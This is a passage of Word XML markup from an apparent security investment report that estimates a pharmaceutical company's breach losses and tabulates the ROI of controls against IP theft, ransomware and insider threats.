        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clinical Trial Invalidation:</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> £50,000,000 (if pipeline compromised)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Re</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gulatory Fines (GDPR + HIPAA):</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> £8,000,000 </w:t>
      </w:r>
      <w:r w:rsidR="00807452" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[74]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Legal Costs &amp; Forensics:</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> £5,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reputational Damage:</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 15% stock decline = £180,000,000 market cap loss</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Operational Downtime:</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 45 days at £500K/day = £22,500,000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Customer Not</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ification &amp; Credit Monitoring:</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> £2,500,000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insurance Premium Increase:</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> +200% over 3 years = £3,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Total Potential Loss:</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> £521,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ROI Calculation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Investment vs. Risk Reduction:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1558"/>
        <w:gridCol w:w="1558"/>
        <w:gridCol w:w="1558"/>
        <w:gridCol w:w="1558"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="1559"/>
      </w:tblGrid>
      <w:tr w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidTr="005B63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Probability (Annual)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Expected Loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Controls Reduce By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cost Avoided</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ROI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidTr="005B63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>IP Theft (APT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>15%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£78M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>95%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£74M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>71:1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidTr="005B63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ransomware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>25%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£5.5M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>90%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£4.95M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidTr="005B63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Insider Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£10M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>80%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£8M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
